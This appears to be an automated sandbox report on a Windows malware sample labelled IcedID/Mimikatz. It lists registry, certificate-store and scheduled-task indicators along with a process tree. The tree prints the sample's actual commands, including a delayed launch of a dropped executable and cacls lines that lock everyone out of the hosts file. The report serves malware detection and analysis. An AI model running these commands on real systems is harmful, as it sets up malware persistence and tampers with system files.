\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2756 cmd.exe 2684 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral1/files/0x0008000000016dff-5.dat nsis_installer_2 behavioral1/files/0x0006000000018708-15.dat nsis_installer_1 behavioral1/files/0x0006000000018708-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" ynzstygee.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-13-a0-b4-39-bb\WpadDecisionTime = 104f4d7bd30edb01 ebayich.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BA60822C-E19F-47B4-9712-7F33DCF809AB}\WpadNetworkName = "Network 3" ebayich.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings ebayich.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" ynzstygee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ebayich.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust ebayich.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 ebayich.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BA60822C-E19F-47B4-9712-7F33DCF809AB}\WpadDecisionTime = 104f4d7bd30edb01 ebayich.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BA60822C-E19F-47B4-9712-7F33DCF809AB}\WpadDecisionReason = "1" ebayich.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs ebayich.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA ebayich.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{BA60822C-E19F-47B4-9712-7F33DCF809AB}\WpadDecisionTime = 504bca3ad30edb01 ebayich.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ebayich.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs ebayich.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0" netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs ebayich.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" ynzstygee.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump\EulaAccepted = "1" ynzstygee.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-13-a0-b4-39-bb\WpadDetectedUrl ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates ebayich.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates ebayich.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs ebayich.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix ebayich.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" ebayich.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs ebayich.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs ebayich.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Sysinternals\ProcDump ynzstygee.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs ebayich.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ynzstygee.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs ebayich.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot ebayich.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings ebayich.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\e6-13-a0-b4-39-bb\WpadDecisionReason = "1" ebayich.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates ebayich.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ ebayich.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" ebayich.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ ebayich.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 ebayich.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 ebayich.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2684 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2276 schtasks.exe 2688 schtasks.exe 2544 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 2 IoCs
pid Process 2864 ebayich.exe 1692 ebayich.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe -
Suspicious behavior: LoadsDriver 31 IoCs
pid Process 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found 476 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 2276 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeDebugPrivilege 2276 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 2656 ebayich.exe Token: SeDebugPrivilege 2560 ebayich.exe Token: SeDebugPrivilege 2000 vfshost.exe Token: SeAuditPrivilege 2204 svchost.exe Token: SeDebugPrivilege 696 ynzstygee.exe Token: SeShutdownPrivilege 696 ynzstygee.exe Token: SeLockMemoryPrivilege 1492 gclpbv.exe Token: SeLockMemoryPrivilege 1492 gclpbv.exe Token: SeDebugPrivilege 1992 ynzstygee.exe Token: SeShutdownPrivilege 1992 ynzstygee.exe Token: SeDebugPrivilege 2688 ynzstygee.exe Token: SeShutdownPrivilege 2688 ynzstygee.exe Token: SeDebugPrivilege 2556 ynzstygee.exe Token: SeShutdownPrivilege 2556 ynzstygee.exe Token: SeDebugPrivilege 3044 ynzstygee.exe Token: SeShutdownPrivilege 3044 ynzstygee.exe Token: SeDebugPrivilege 2636 ynzstygee.exe Token: SeShutdownPrivilege 2636 ynzstygee.exe Token: SeDebugPrivilege 1648 ynzstygee.exe Token: SeShutdownPrivilege 1648 ynzstygee.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 2276 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe 2276 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe 2656 ebayich.exe 2656 ebayich.exe 2560 ebayich.exe 2560 ebayich.exe 1780 xohudmc.exe 1812 huzbeq.exe 2864 ebayich.exe 2864 ebayich.exe 1692 ebayich.exe 1692 ebayich.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2276 wrote to memory of 2756 2276 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe 30 PID 2276 wrote to memory of 2756 2276 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe 30 PID 2276 wrote to memory of 2756 2276 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe 30 PID 2276 wrote to memory of 2756 2276 2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe 30 PID 2756 wrote to memory of 2684 2756 cmd.exe 32 PID 2756 wrote to memory of 2684 2756 cmd.exe 32 PID 2756 wrote to memory of 2684 2756 cmd.exe 32 PID 2756 wrote to memory of 2684 2756 cmd.exe 32 PID 2756 wrote to memory of 2656 2756 cmd.exe 33 PID 2756 wrote to memory of 2656 2756 cmd.exe 33 PID 2756 wrote to memory of 2656 2756 cmd.exe 33 PID 2756 wrote to memory of 2656 2756 cmd.exe 33 PID 2560 wrote to memory of 1760 2560 ebayich.exe 35 PID 2560 wrote to memory of 1760 2560 ebayich.exe 35 PID 2560 wrote to memory of 1760 2560 ebayich.exe 35 PID 2560 wrote to memory of 1760 2560 ebayich.exe 35 PID 1760 wrote to memory of 2568 1760 cmd.exe 37 PID 1760 wrote to memory of 2568 1760 cmd.exe 37 PID 1760 wrote to memory of 2568 1760 cmd.exe 37 PID 1760 wrote to memory of 2568 1760 cmd.exe 37 PID 1760 wrote to memory of 2596 1760 cmd.exe 38 PID 1760 wrote to memory of 2596 1760 cmd.exe 38 PID 1760 wrote to memory of 2596 1760 cmd.exe 38 PID 1760 wrote to memory of 2596 1760 cmd.exe 38 PID 1760 wrote to memory of 2660 1760 cmd.exe 39 PID 1760 wrote to memory of 2660 1760 cmd.exe 39 PID 1760 wrote to memory of 2660 1760 cmd.exe 39 PID 1760 wrote to memory of 2660 1760 cmd.exe 39 PID 1760 wrote to memory of 3012 1760 cmd.exe 40 PID 1760 wrote to memory of 3012 1760 cmd.exe 40 PID 1760 wrote to memory of 3012 1760 cmd.exe 40 PID 1760 wrote to memory of 3012 1760 cmd.exe 40 PID 1760 wrote to memory of 2588 1760 cmd.exe 41 PID 1760 wrote to memory of 2588 1760 cmd.exe 41 PID 1760 wrote to memory of 2588 1760 cmd.exe 41 PID 1760 wrote to memory of 2588 1760 cmd.exe 41 PID 1760 wrote to memory of 2208 1760 cmd.exe 42 PID 1760 wrote to memory of 2208 1760 cmd.exe 42 PID 1760 wrote to memory of 2208 1760 cmd.exe 42 PID 1760 wrote to memory of 2208 1760 cmd.exe 42 PID 2560 wrote to memory of 2340 2560 ebayich.exe 43 PID 2560 wrote to memory of 2340 2560 ebayich.exe 43 PID 2560 wrote to memory of 2340 2560 ebayich.exe 43 PID 2560 wrote to memory of 2340 2560 ebayich.exe 43 PID 2560 wrote to memory of 2628 2560 ebayich.exe 45 PID 2560 wrote to memory of 2628 2560 ebayich.exe 45 PID 2560 wrote to memory of 2628 2560 ebayich.exe 45 PID 2560 wrote to memory of 2628 2560 ebayich.exe 45 PID 2560 wrote to memory of 1648 2560 ebayich.exe 47 PID 2560 wrote to memory of 1648 2560 ebayich.exe 47 PID 2560 wrote to memory of 1648 2560 ebayich.exe 47 PID 2560 wrote to memory of 1648 2560 ebayich.exe 47 PID 2560 wrote to memory of 572 2560 ebayich.exe 49 PID 2560 wrote to memory of 572 2560 ebayich.exe 49 PID 2560 wrote to memory of 572 2560 ebayich.exe 49 PID 2560 wrote to memory of 572 2560 ebayich.exe 49 PID 572 wrote to memory of 2600 572 cmd.exe 51 PID 572 wrote to memory of 2600 572 cmd.exe 51 PID 572 wrote to memory of 2600 572 cmd.exe 51 PID 572 wrote to memory of 2600 572 cmd.exe 51 PID 572 wrote to memory of 2600 572 cmd.exe 51 PID 572 wrote to memory of 2600 572 cmd.exe 51 PID 572 wrote to memory of 2600 572 cmd.exe 51 PID 2600 wrote to memory of 484 2600 wpcap.exe 52
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:348
-
C:\Windows\TEMP\uhueclsek\gclpbv.exe"C:\Windows\TEMP\uhueclsek\gclpbv.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-09-24_7007b9768f58f15f8a549db38beb005f_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\enveqymf\ebayich.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2684
-
-
C:\Windows\enveqymf\ebayich.exeC:\Windows\enveqymf\ebayich.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2656
-
-
-
C:\Windows\enveqymf\ebayich.exeC:\Windows\enveqymf\ebayich.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2568
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:2596
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2660
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2588
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2208
-
-
-
